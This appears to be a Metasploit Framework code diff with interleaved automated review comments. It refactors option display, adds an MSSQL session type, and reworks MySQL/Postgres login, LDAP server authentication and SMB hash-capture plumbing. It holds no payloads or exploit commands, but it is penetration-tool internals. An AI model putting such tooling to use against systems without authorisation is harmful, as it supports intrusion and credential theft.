||||
'Required',
|
||||
'Description'
|
||||
])
|
||||
option_tables = []
|
||||
|
||||
options.sort_by(&:name).each do |opt|
|
||||
name = opt.name
|
||||
if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
|
||||
val = mod.datastore[name]
|
||||
else
|
||||
val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
|
||||
end
|
||||
options_grouped_by_conditions.sort.each do |conditions, options|
|
||||
tbl = options_table(missing, mod, options, indent)
|
||||
|
||||
next if (opt.advanced?)
|
||||
next if (opt.evasion?)
|
||||
next if (missing && opt.valid?(val))
|
||||
|
||||
desc = opt.desc.dup
|
||||
|
||||
# Hint at RPORT proto by regexing mixins
|
||||
if name == 'RPORT' && opt.kind_of?(Msf::OptPort)
|
||||
mod.class.included_modules.each do |m|
|
||||
case m.name
|
||||
when /tcp/i, /HttpClient$/
|
||||
desc << ' (TCP)'
|
||||
break
|
||||
when /udp/i
|
||||
desc << ' (UDP)'
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", desc ]
|
||||
end
|
||||
|
||||
next if conditions.any? && tbl.rows.empty?
|
||||
next if tbl.rows.empty?
|
||||
|
||||
if conditions.any?
|
||||
options_with_conditions << "\n\n#{indent}When #{Msf::OptCondition.format_conditions(mod, options.first)}:\n\n"
|
||||
options_with_conditions << tbl.to_s
|
||||
option_tables << "#{indent}When #{Msf::OptCondition.format_conditions(mod, options.first)}:\n\n#{tbl}"
|
||||
else
|
||||
options_without_conditions << tbl.to_s
|
||||
option_tables << tbl.to_s
|
||||
end
|
||||
end
|
||||
|
||||
result = "#{options_without_conditions}#{options_with_conditions}"
|
||||
options_by_group.each do |group, options|
|
||||
tbl = options_table(missing, mod, options, indent)
|
||||
option_tables << "#{indent}#{group.description}:\n\n#{tbl}"
|
||||
end
|
||||
|
||||
result = option_tables.join("\n\n")
|
||||
result
|
||||
end
|
||||
|
||||
# Creates the table for the given module options
|
||||
#
|
||||
# @param missing [Boolean] dump only empty required options.
|
||||
# @param mod [Msf::Module] the module.
|
||||
# @param options [Array<Msf::OptBase>] The options to be added to the table
|
||||
# @param indent [String] the indentation to use.
|
||||
#
|
||||
# @return [String] the string form of the table.
|
||||
def self.options_table(missing, mod, options, indent)
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Columns' =>
|
||||
[
|
||||
'Name',
|
||||
'Current Setting',
|
||||
'Required',
|
||||
'Description'
|
||||
]
|
||||
)
|
||||
options.sort_by(&:name).each do |opt|
|
||||
name = opt.name
|
||||
if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
|
||||
val = mod.datastore[name]
|
||||
else
|
||||
val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
|
||||
end
|
||||
next if (missing && opt.valid?(val))
|
||||
|
||||
desc = opt.desc.dup
|
||||
|
||||
# Hint at RPORT proto by regexing mixins
|
||||
if name == 'RPORT' && opt.kind_of?(Msf::OptPort)
|
||||
mod.class.included_modules.each do |m|
|
||||
case m.name
|
||||
when /tcp/i, /HttpClient$/
|
||||
desc << ' (TCP)'
|
||||
break
|
||||
when /udp/i
|
||||
desc << ' (UDP)'
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
tbl << [name, opt.display_value(val), opt.required? ? "yes" : "no", desc]
|
||||
end
|
||||
tbl
|
||||
end
|
||||
|
||||
# Dumps the advanced options associated with the supplied module.
|
||||
#
|
||||
# @param mod [Msf::Module] the module.
|
||||
# @param indent [String] the indentation to use.
|
||||
# @return [String] the string form of the information.
|
||||
def self.dump_advanced_options(mod, indent = '')
|
||||
options = mod.options.map { |_name, option| option }
|
||||
options_grouped_by_conditions = options.group_by(&:conditions)
|
||||
|
||||
options_with_conditions = ''.dup
|
||||
options_without_conditions = ''.dup
|
||||
|
||||
options_grouped_by_conditions.each do |conditions, options|
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Columns' =>
|
||||
[
|
||||
'Name',
|
||||
'Current Setting',
|
||||
'Required',
|
||||
'Description'
|
||||
])
|
||||
|
||||
options.sort_by(&:name).each do |opt|
|
||||
next unless opt.advanced?
|
||||
|
||||
name = opt.name
|
||||
if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
|
||||
val = mod.datastore[name]
|
||||
else
|
||||
val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
|
||||
end
|
||||
tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ]
|
||||
end
|
||||
|
||||
next if conditions.any? && tbl.rows.empty?
|
||||
|
||||
if conditions.any?
|
||||
options_with_conditions << "\n\n#{indent}Active when #{Msf::OptCondition.format_conditions(mod, options.first)}:\n\n"
|
||||
options_with_conditions << tbl.to_s
|
||||
else
|
||||
options_without_conditions << tbl.to_s
|
||||
end
|
||||
end
|
||||
|
||||
result = "#{options_without_conditions}#{options_with_conditions}"
|
||||
result
|
||||
return dump_options(mod, indent, advanced: true)
|
||||
end
|
||||
|
||||
# Dumps the evasion options associated with the supplied module.
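Review bot: In the new `dump_options`, `options_by_group` is built from `mod.options[name]` rather than from `filtered_options`, so the `advanced:`/`evasion:` filter never reaches grouped options, and the loop over groups has no `next if tbl.rows.empty?`. As written, `dump_advanced_options` and `dump_evasion_options` (the latter delegates here in the next hunk) would also print every group table, including empty ones. I would build the pairs as `[group, filtered_options.select { |opt| group.option_names.include?(opt.name) }]` and add `next if tbl.rows.empty?` before appending the group table. Separately, the doc comment on `options_table` says `@return [String]`, but the method returns `tbl` and callers use `tbl.rows`; `# @return [Rex::Text::Table] the populated table.` would match the code.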
|
||||
@@ -686,46 +666,7 @@ class ReadableText
|
||||
# @param indent [String] the indentation to use.
|
||||
# @return [String] the string form of the information.
|
||||
def self.dump_evasion_options(mod, indent = '')
|
||||
options = mod.options.map { |_name, option| option }
|
||||
options_grouped_by_conditions = options.group_by(&:conditions)
|
||||
|
||||
options_with_conditions = ''.dup
|
||||
options_without_conditions = ''.dup
|
||||
|
||||
options_grouped_by_conditions.each do |conditions, options|
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => indent.length,
|
||||
'Columns' =>
|
||||
[
|
||||
'Name',
|
||||
'Current Setting',
|
||||
'Required',
|
||||
'Description'
|
||||
])
|
||||
|
||||
options.sort_by(&:name).each do |opt|
|
||||
next unless opt.evasion?
|
||||
|
||||
name = opt.name
|
||||
if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
|
||||
val = mod.datastore[name]
|
||||
else
|
||||
val = mod.datastore[name].nil? ? opt.default : mod.datastore[name]
|
||||
end
|
||||
tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ]
|
||||
end
|
||||
|
||||
next if conditions.any? && tbl.rows.empty?
|
||||
|
||||
if conditions.any?
|
||||
options_with_conditions << "\n\n#{indent}When #{Msf::OptCondition.format_conditions(mod, options.first)}:\n\n"
|
||||
options_with_conditions << tbl.to_s
|
||||
else
|
||||
options_without_conditions << tbl.to_s
|
||||
end
|
||||
end
|
||||
result = "#{options_without_conditions}#{options_with_conditions}"
|
||||
result
|
||||
return dump_options(mod, indent, evasion: true)
|
||||
end
|
||||
|
||||
# Dumps the references associated with the supplied module.
|
||||
|
||||
@@ -15,9 +15,14 @@ module CommandShellOptions
|
||||
def initialize(info = {})
|
||||
super(info)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('CreateSession', [false, 'Create a new session for every successful login', true])
|
||||
]
|
||||
)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('CreateSession', [false, 'Create a new session for every successful login', true]),
|
||||
OptString.new('InitialAutoRunScript', "An initial script to run on session creation (before AutoRunScript)"),
|
||||
OptString.new('AutoRunScript', "A script to run automatically on session creation."),
|
||||
OptString.new('CommandShellCleanupCommand', "A command to run before the session is closed"),
|
||||
|
||||
@@ -0,0 +1,143 @@
|
||||
# -*- coding:binary -*-
|
||||
|
||||
require 'rex/post/mssql'
|
||||
|
||||
class Msf::Sessions::MSSQL
|
||||
|
||||
include Msf::Session::Basic
|
||||
include Msf::Sessions::Scriptable
|
||||
|
||||
# @return [Rex::Post::MSSQL::Ui::Console] The interactive console
|
||||
attr_accessor :console
|
||||
# @return [MSSQL::Client] The MSSQL client
|
||||
attr_accessor :client
|
||||
attr_accessor :platform, :arch
|
||||
attr_reader :framework
|
||||
|
||||
def initialize(rstream, opts = {})
|
||||
@client = opts.fetch(:client)
|
||||
self.console = Rex::Post::MSSQL::Ui::Console.new(self, opts)
|
||||
|
||||
super(rstream, opts)
|
||||
end
|
||||
|
||||
def bootstrap(datastore = {}, handler = nil)
|
||||
session = self
|
||||
session.init_ui(user_input, user_output)
|
||||
|
||||
@info = "MSSQL #{datastore['USERNAME']} @ #{@peer_info}"
|
||||
end
|
||||
|
||||
def execute_file(full_path, args)
|
||||
if File.extname(full_path) == '.rb'
|
||||
Rex::Script::Shell.new(self, full_path).run(args)
|
||||
else
|
||||
console.load_resource(full_path)
|
||||
end
|
||||
end
|
||||
|
||||
def process_autoruns(datastore)
|
||||
['InitialAutoRunScript', 'AutoRunScript'].each do |key|
|
||||
next if datastore[key].nil? || datastore[key].empty?
|
||||
|
||||
args = Shellwords.shellwords(datastore[key])
|
||||
print_status("Session ID #{self.sid} (#{self.tunnel_to_s}) processing #{key} '#{datastore[key]}'")
|
||||
self.execute_script(args.shift, *args)
|
||||
end
|
||||
end
|
||||
|
||||
def type
|
||||
self.class.type
|
||||
end
|
||||
|
||||
# Returns the type of session.
|
||||
#
|
||||
def self.type
|
||||
'mssql'
|
||||
end
|
||||
|
||||
def self.can_cleanup_files
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the session description.
|
||||
#
|
||||
def desc
|
||||
'MSSQL'
|
||||
end
|
||||
|
||||
def address
|
||||
return @address if @address
|
||||
|
||||
@address, @port = client.sock.peerinfo.split(':')
|
||||
@address
|
||||
end
|
||||
|
||||
def port
|
||||
return @port if @port
|
||||
|
||||
@address, @port = client.sock.peerinfo.split(':')
|
||||
@port
|
||||
end
|
||||
|
||||
##
|
||||
# :category: Msf::Session::Interactive implementors
|
||||
#
|
||||
# Initializes the console's I/O handles.
|
||||
#
|
||||
def init_ui(input, output)
|
||||
self.user_input = input
|
||||
self.user_output = output
|
||||
console.init_ui(input, output)
|
||||
console.set_log_source(log_source)
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
##
|
||||
# :category: Msf::Session::Interactive implementors
|
||||
#
|
||||
# Resets the console's I/O handles.
|
||||
#
|
||||
def reset_ui
|
||||
console.unset_log_source
|
||||
console.reset_ui
|
||||
end
|
||||
|
||||
def exit
|
||||
console.stop
|
||||
end
|
||||
|
||||
##
|
||||
# :category: Msf::Session::Interactive implementors
|
||||
#
|
||||
# Override the basic session interaction to use shell_read and
|
||||
# shell_write instead of operating on rstream directly.
|
||||
def _interact
|
||||
framework.events.on_session_interact(self)
|
||||
framework.history_manager.with_context(name: type.to_sym) do
|
||||
_interact_stream
|
||||
end
|
||||
end
|
||||
|
||||
##
|
||||
# :category: Msf::Session::Interactive implementors
|
||||
#
|
||||
def _interact_stream
|
||||
framework.events.on_session_interact(self)
|
||||
|
||||
console.framework = framework
|
||||
# Call the console interaction of the MSSQL client and
|
||||
# pass it a block that returns whether or not we should still be
|
||||
# interacting. This will allow the shell to abort if interaction is
|
||||
# canceled.
|
||||
console.interact { interacting != true }
|
||||
console.framework = nil
|
||||
|
||||
# If the stop flag has been set, then that means the user exited. Raise
|
||||
# the EOFError so we can drop this handle like a bad habit.
|
||||
raise EOFError if (console.stopped? == true)
|
||||
end
|
||||
|
||||
end
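Review bot: `address` and `port` split `client.sock.peerinfo` on every `:`, so an IPv6 peer, whose address itself contains colons, would leave `@address` and `@port` holding fragments of the address (this assumes peerinfo is formatted as `host:port`). Splitting on the last colon only avoids that: `@address, _sep, @port = client.sock.peerinfo.rpartition(':')`, ideally in one private helper that both methods call. Also, `_interact` calls `framework.events.on_session_interact(self)` and `_interact_stream` calls it again, so the event appears to fire twice per interaction; one of the two calls can be dropped.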
|
||||
@@ -49,7 +49,7 @@ class Msf::Sessions::MySQL
|
||||
|
||||
# @return [String] The type of the session
|
||||
def self.type
|
||||
'MySQL'
|
||||
'mysql'
|
||||
end
|
||||
|
||||
# @return [Boolean] Can the session clean up after itself
|
||||
|
||||
@@ -57,7 +57,7 @@ class Msf::Sessions::PostgreSQL
|
||||
# @return [String] The type of the session
|
||||
#
|
||||
def self.type
|
||||
'PostgreSQL'
|
||||
'postgresql'
|
||||
end
|
||||
|
||||
#
|
||||
|
||||
@@ -57,7 +57,7 @@ class Msf::Sessions::SMB
|
||||
# Returns the type of session.
|
||||
#
|
||||
def self.type
|
||||
'SMB'
|
||||
'smb'
|
||||
end
|
||||
|
||||
def self.can_cleanup_files
|
||||
|
||||
@@ -342,7 +342,7 @@ class EncodedPayload
|
||||
wlog("#{pinst.refname}: Failed to find preferred nop #{reqs['Nop']}")
|
||||
end
|
||||
|
||||
nops.each_module { |nopname, nopmod|
|
||||
nops.each { |nopname, nopmod|
|
||||
# Create an instance of the nop module
|
||||
self.nop = nopmod.new
|
||||
|
||||
|
||||
@@ -142,6 +142,10 @@ class Encoder < Module
|
||||
# Bash brace expansion encoding.
|
||||
#
|
||||
CmdPosixBrace = 'brace'
|
||||
#
|
||||
# Base64 encoding.
|
||||
#
|
||||
CmdPosixBase64 = 'base64'
|
||||
end
|
||||
|
||||
#
|
||||
|
||||
@@ -183,7 +183,7 @@ module Enumeration
|
||||
end
|
||||
|
||||
def dns_get_ptr(ip)
|
||||
resp = dns_query(ip, nil)
|
||||
resp = dns_query(ip, 'PTR')
|
||||
return if resp.blank? || resp.answer.blank?
|
||||
|
||||
records = []
|
||||
@@ -227,7 +227,7 @@ module Enumeration
|
||||
srv_record_types.each do |srv_record_type|
|
||||
srv_protos.each do |srv_proto|
|
||||
srv_record = "_#{srv_record_type}._#{srv_proto}.#{domain}"
|
||||
resp = dns_query(srv_record, Net::DNS::SRV)
|
||||
resp = dns_query(srv_record, 'SRV')
|
||||
next if resp.blank? || resp.answer.blank?
|
||||
srv_record_data = []
|
||||
resp.answer.each do |r|
|
||||
|
||||
@@ -76,6 +76,13 @@ module Msf
|
||||
#
|
||||
def start_service
|
||||
comm = _determine_server_comm(bindhost)
|
||||
auth_handler = Rex::Proto::LDAP::Auth.new(
|
||||
datastore['CHALLENGE'],
|
||||
datastore['Domain'],
|
||||
datastore['Server'],
|
||||
datastore['DnsName'],
|
||||
datastore['DnsDomain']
|
||||
)
|
||||
self.service = Rex::ServiceManager.start(
|
||||
Rex::Proto::LDAP::Server,
|
||||
bindhost,
|
||||
@@ -84,6 +91,7 @@ module Msf
|
||||
datastore['LdapServerTcp'],
|
||||
read_ldif,
|
||||
comm,
|
||||
auth_handler,
|
||||
{ 'Msf' => framework, 'MsfExploit' => self }
|
||||
)
|
||||
|
||||
|
||||
@@ -17,6 +17,8 @@ module Exploit::Remote::MSSQL
|
||||
include Msf::Exploit::Remote::Kerberos::Ticket::Storage
|
||||
include Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
|
||||
|
||||
attr_accessor :mssql_client
|
||||
|
||||
#
|
||||
# Creates an instance of a MSSQL exploit module.
|
||||
#
|
||||
@@ -46,6 +48,11 @@ module Exploit::Remote::MSSQL
|
||||
register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
|
||||
end
|
||||
|
||||
def set_session(client)
|
||||
print_status("Using existing session #{session.sid}")
|
||||
@mssql_client = client
|
||||
end
|
||||
|
||||
#
|
||||
# This method sends a UDP query packet to the server and
|
||||
# parses out the reply packet into a hash
|
||||
|
||||
@@ -19,6 +19,10 @@ module Exploit::Remote::MYSQL
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
# @!attribute [rw] mysql_conn
|
||||
# @return [::Mysql]
|
||||
attr_accessor :mysql_conn
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
@@ -33,17 +37,13 @@ module Exploit::Remote::MYSQL
|
||||
end
|
||||
|
||||
def mysql_login(user='root', pass='', db=nil)
|
||||
unless defined?(session).nil? || session.nil?
|
||||
print_status("Using existing session #{session.sid}")
|
||||
@mysql_handle = session.client
|
||||
return true
|
||||
end
|
||||
|
||||
disconnect if self.sock
|
||||
disconnect if sock
|
||||
connect
|
||||
|
||||
begin
|
||||
@mysql_handle = ::Mysql.connect(rhost, user, pass, db, rport, io: sock)
|
||||
self.mysql_conn = ::Mysql.connect(rhost, user, pass, db, rport, io: sock)
|
||||
# Deprecating this in favor off `mysql_conn`
|
||||
@mysql_handle = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(self, :mysql_conn, :@mysql_handle, ActiveSupport::Deprecation.new)
|
||||
|
||||
rescue Errno::ECONNREFUSED
|
||||
print_error("Connection refused")
|
||||
@@ -62,20 +62,14 @@ module Exploit::Remote::MYSQL
|
||||
return false
|
||||
end
|
||||
|
||||
vprint_good "#{rhost}:#{rport} MySQL - Logged in to '#{db}' with '#{user}':'#{pass}'"
|
||||
vprint_good "#{mysql_conn.host}:#{mysql_conn.port} MySQL - Logged in to '#{db}' with '#{user}':'#{pass}'"
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
def mysql_logoff
|
||||
# Don't log out if we are using a session.
|
||||
if defined?(session) && session
|
||||
vprint_status "#{rhost}:#{rport} MySQL - Skipping disconnecting from the session"
|
||||
return
|
||||
end
|
||||
|
||||
@mysql_handle = nil if @mysql_handle
|
||||
disconnect if self.sock
|
||||
mysql_conn.close if mysql_conn
|
||||
disconnect if sock
|
||||
vprint_status "#{rhost}:#{rport} MySQL - Disconnected"
|
||||
end
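Review bot: `mysql_logoff` closes `mysql_conn` but never clears it, whereas the code it replaces reset `@mysql_handle` to nil. A later `mysql_query` would then call `query` on a closed connection, and a repeated logoff would call `close` on it again. Adding `self.mysql_conn = nil` after the close keeps the old behaviour. The `Disconnected` message also still prints `rhost:rport`, while the login and query messages in this commit moved to `mysql_conn.host` and `mysql_conn.port`.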
|
||||
|
||||
@@ -92,7 +86,7 @@ module Exploit::Remote::MYSQL
|
||||
|
||||
def mysql_query(sql)
|
||||
begin
|
||||
res = @mysql_handle.query(sql)
|
||||
res = mysql_conn.query(sql)
|
||||
rescue ::Mysql::Error => e
|
||||
print_error("MySQL Error: #{e.class} #{e.to_s}")
|
||||
return nil
|
||||
@@ -101,7 +95,7 @@ module Exploit::Remote::MYSQL
|
||||
return nil
|
||||
end
|
||||
|
||||
vprint_status "#{rhost}:#{rport} MySQL - querying with '#{sql}'"
|
||||
vprint_status "#{mysql_conn.host}:#{mysql_conn.port} MySQL - querying with '#{sql}'"
|
||||
res
|
||||
end
|
||||
|
||||
|
||||
@@ -88,17 +88,13 @@ module Exploit::Remote::Postgres
|
||||
# @return [:error] if some other error occurred
|
||||
# @return [:connected] if everything went as planned
|
||||
def postgres_login(opts={})
|
||||
unless defined?(session).nil? || session.nil?
|
||||
self.postgres_conn = session.client
|
||||
return :connected
|
||||
end
|
||||
|
||||
postgres_logout if self.postgres_conn
|
||||
db = opts[:database] || datastore['DATABASE']
|
||||
username = opts[:username] || datastore['USERNAME']
|
||||
password = opts[:password] || datastore['PASSWORD']
|
||||
ip = opts[:server] || datastore['RHOST']
|
||||
port = opts[:port] || datastore['RPORT']
|
||||
proxies = opts[:proxies] || datastore['Proxies']
|
||||
uri = "tcp://#{ip}:#{port}"
|
||||
|
||||
if Rex::Socket.is_ipv6?(ip)
|
||||
@@ -107,7 +103,7 @@ module Exploit::Remote::Postgres
|
||||
|
||||
verbose = opts[:verbose] || datastore['VERBOSE']
|
||||
begin
|
||||
self.postgres_conn = Connection.new(db,username,password,uri)
|
||||
self.postgres_conn = Connection.new(db,username,password,uri,proxies)
|
||||
rescue RuntimeError => e
|
||||
case e.to_s.split("\t")[1]
|
||||
when "C3D000"
|
||||
@@ -125,7 +121,7 @@ module Exploit::Remote::Postgres
|
||||
return :connection_refused
|
||||
end
|
||||
if self.postgres_conn
|
||||
print_good "#{ip}:#{port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
|
||||
print_good "#{self.postgres_conn.address}:#{self.postgres_conn.port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
|
||||
return :connected
|
||||
end
|
||||
end
|
||||
@@ -134,20 +130,15 @@ module Exploit::Remote::Postgres
|
||||
#
|
||||
# @return [void]
|
||||
def postgres_logout
|
||||
ip = datastore['RHOST']
|
||||
port = datastore['RPORT']
|
||||
ip = self.postgres_conn.address
|
||||
port = self.postgres_conn.port
|
||||
verbose = datastore['VERBOSE']
|
||||
# Don't log out if we are using a session.
|
||||
if defined?(session) && session
|
||||
print_status "#{ip}:#{port} Postgres - Skipping disconnecting from the session" if verbose
|
||||
return
|
||||
end
|
||||
|
||||
if self.postgres_conn
|
||||
self.postgres_conn.close if(self.postgres_conn.kind_of?(Connection) && self.postgres_conn.instance_variable_get("@conn"))
|
||||
self.postgres_conn = nil
|
||||
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
|
||||
end
|
||||
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
|
||||
end
|
||||
|
||||
# If not currently connected, attempt to connect. If an
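Review bot: `postgres_logout` now reads `self.postgres_conn.address` and `.port` on its first two lines, before the `if self.postgres_conn` check further down, so calling it with no open connection raises NoMethodError instead of being a no-op. `postgres_login` guards its own call, but any caller that logs out unconditionally, for example in cleanup code, would hit this. A guard at the top, `return unless self.postgres_conn`, restores the old tolerance. The `Disconnected` message, which appears to have moved outside the `if`, would then also print only when something was actually closed. The `Rows Returned` line in the `postgres_print_reply` hunk below dereferences `postgres_conn` the same way.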
|
||||
@@ -158,17 +149,16 @@ module Exploit::Remote::Postgres
|
||||
# @param doprint [Boolean] Whether the result should be printed
|
||||
# @return [Hash]
|
||||
def postgres_query(sql=nil,doprint=false)
|
||||
ip = datastore['RHOST']
|
||||
port = datastore['RPORT']
|
||||
unless self.postgres_conn
|
||||
result = postgres_login
|
||||
unless result == :connected
|
||||
return { :conn_error => result }
|
||||
return { conn_error: result }
|
||||
end
|
||||
end
|
||||
|
||||
if self.postgres_conn
|
||||
sql ||= datastore['SQL']
|
||||
vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
|
||||
vprint_status "#{self.postgres_conn.address}:#{self.postgres_conn.port} Postgres - querying with '#{sql}'"
|
||||
begin
|
||||
resp = self.postgres_conn.query(sql)
|
||||
rescue RuntimeError => e
|
||||
@@ -202,12 +192,11 @@ module Exploit::Remote::Postgres
|
||||
# Otherwise, create a rowset using Rex::Text::Table (if there's
|
||||
# more than 0 rows) and return :complete.
|
||||
def postgres_print_reply(resp=nil,sql=nil)
|
||||
ip = datastore['RHOST']
|
||||
port = datastore['RPORT']
|
||||
verbose = datastore['VERBOSE']
|
||||
return :error unless resp.kind_of? Connection::Result
|
||||
|
||||
if resp.rows and resp.fields
|
||||
print_status "#{ip}:#{port} Rows Returned: #{resp.rows.size}" if verbose
|
||||
print_status "#{postgres_conn.address}:#{postgres_conn.port} Rows Returned: #{resp.rows.size}" if verbose
|
||||
if resp.rows.size > 0
|
||||
tbl = Rex::Text::Table.new(
|
||||
'Indent' => 4,
|
||||
|
||||
@@ -62,7 +62,7 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
|
||||
origin = create_credential_origin_service(
|
||||
{
|
||||
address: address,
|
||||
port: datastore['SRVPORT'],
|
||||
port: srvport,
|
||||
service_name: 'smb',
|
||||
protocol: 'tcp',
|
||||
module_fullname: fullname,
|
||||
@@ -74,7 +74,7 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
|
||||
origin: origin,
|
||||
origin_type: :service,
|
||||
address: address,
|
||||
port: datastore['SRVPORT'],
|
||||
port: srvport,
|
||||
service_name: 'smb',
|
||||
username: user,
|
||||
server_challenge: challenge,
|
||||
|
||||
@@ -27,7 +27,6 @@ module Msf
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, 'The local port to listen on.', 445 ]),
|
||||
OptString.new('SHARE', [ false, 'Share (Default: random); cannot contain spaces or slashes'], regex: /^[^\s\/\\]*$/),
|
||||
OptString.new('FILE_NAME', [ false, 'File name to share (Default: random)']),
|
||||
OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default: none)'])
|
||||
|
||||
@@ -25,6 +25,7 @@ module Msf
|
||||
SMB_SESSION_TYPE = 'smb_session_type'
|
||||
POSTGRESQL_SESSION_TYPE = 'postgresql_session_type'
|
||||
MYSQL_SESSION_TYPE = 'mysql_session_type'
|
||||
MSSQL_SESSION_TYPE = 'mssql_session_type'
|
||||
DEFAULTS = [
|
||||
{
|
||||
name: WRAPPED_TABLES,
|
||||
@@ -83,6 +84,12 @@ module Msf
|
||||
requires_restart: true,
|
||||
default_value: false
|
||||
}.freeze,
|
||||
{
|
||||
name: MSSQL_SESSION_TYPE,
|
||||
description: 'When enabled will allow for the creation/use of mssql sessions',
|
||||
requires_restart: true,
|
||||
default_value: false
|
||||
}.freeze,
|
||||
{
|
||||
name: DNS_FEATURE,
|
||||
description: 'When enabled, allows configuration of DNS resolution behaviour in Metasploit',
|
||||
|
||||
@@ -242,41 +242,44 @@ module Msf::Module::Alert
|
||||
# with this method will not be displayed again.
|
||||
def alert_user
|
||||
self.you_have_been_warned ||= {}
|
||||
without_prompt do
|
||||
errors.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
print_error(msg, prefix: '')
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
errors.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
without_prompt { print_error(msg, prefix: '') }
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
end
|
||||
|
||||
warnings.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
print_warning(msg, prefix: '')
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
warnings.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
without_prompt { print_warning(msg, prefix: '') }
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
end
|
||||
|
||||
infos.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
# Make prefix an empty string to avoid adding clutter (timestamps, rhost, rport, etc.) to the output
|
||||
print_status(msg, prefix: '')
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
infos.each do |msg|
|
||||
if msg && !self.you_have_been_warned[msg.hash]
|
||||
# Make prefix an empty string to avoid adding clutter (timestamps, rhost, rport, etc.) to the output
|
||||
without_prompt { print_status(msg, prefix: '') }
|
||||
self.you_have_been_warned[msg.hash] = true
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Temporarily set the prompt mode to false to ensure that there are not additional lines printed
|
||||
# A workaround for the prompting bug spotted in https://github.com/rapid7/metasploit-framework/pull/18761#issuecomment-1916645095
|
||||
# Temporarily set the prompt mode to false to ensure that there are not additional lines printed
|
||||
# A workaround for the prompting bug spotted in https://github.com/rapid7/metasploit-framework/pull/18761#issuecomment-1916645095
|
||||
def without_prompt(&block)
|
||||
if user_output
|
||||
previous_prompting_value = user_output.prompting?
|
||||
user_output.prompting(false)
|
||||
end
|
||||
# Some user outputs cannot have their prompting value configured, i.e. WebConsolePipe
|
||||
return yield unless user_output.respond_to?(:prompting)
|
||||
|
||||
yield
|
||||
ensure
|
||||
user_output.prompting(previous_prompting_value) if user_output
|
||||
begin
|
||||
if user_output
|
||||
previous_prompting_value = user_output.prompting?
|
||||
user_output.prompting(false)
|
||||
end
|
||||
|
||||
yield
|
||||
ensure
|
||||
user_output.prompting(previous_prompting_value) if user_output
|
||||
end
|
||||
end
|
||||
end
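Review bot: After the early `return yield unless user_output.respond_to?(:prompting)` in the new `without_prompt`, `user_output` cannot be nil, so the two `if user_output` guards inside the `begin`/`ensure` are dead code and suggest a case the method never reaches. The `&block` parameter is also unused, since the body calls `yield`. The early return checks only `prompting`, while the body also calls `prompting?`; if an output can define one without the other, the check should cover both, for example `return yield unless user_output.respond_to?(:prompting) && user_output.respond_to?(:prompting?)`.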
|
||||
|
||||
@@ -67,4 +67,28 @@ module Msf::Module::Options
|
||||
self.options.add_options(options, owner)
|
||||
import_defaults(false)
|
||||
end
|
||||
|
||||
# Registers a new option group, merging options by default
|
||||
#
|
||||
# @param name [String] Name for the group
|
||||
# @param description [String] Description of the group
|
||||
# @param option_names [Array<String>] List of datastore option names
|
||||
# @param merge [Boolean] whether to merge or overwrite the groups option names
|
||||
def register_option_group(name:, description:, option_names: [], merge: true)
|
||||
existing_group = options.groups[name]
|
||||
if merge && existing_group
|
||||
existing_group.description = description
|
||||
existing_group.add_options(option_names)
|
||||
else
|
||||
option_group = Msf::OptionGroup.new(name: name, description: description, option_names: option_names)
|
||||
options.add_group(option_group)
|
||||
end
|
||||
end
|
||||
|
||||
# De-registers an option group by name
|
||||
#
|
||||
# @param name [String] Name for the group
|
||||
def deregister_option_group(name:)
|
||||
options.remove_group(name)
|
||||
end
|
||||
end
|
||||
|
||||
@@ -295,7 +295,7 @@ class Obj
|
||||
def parse_platform_list(platform_string)
|
||||
return nil if platform_string.nil?
|
||||
|
||||
if platform_string.casecmp('All')
|
||||
if platform_string.casecmp?('All')
|
||||
# empty string represents all platforms in Msf::Module::PlatformList
|
||||
platforms = ['']
|
||||
else
|
||||
|
||||
@@ -3,9 +3,10 @@
|
||||
module Msf
|
||||
module OptCondition
|
||||
# Check a condition's result
|
||||
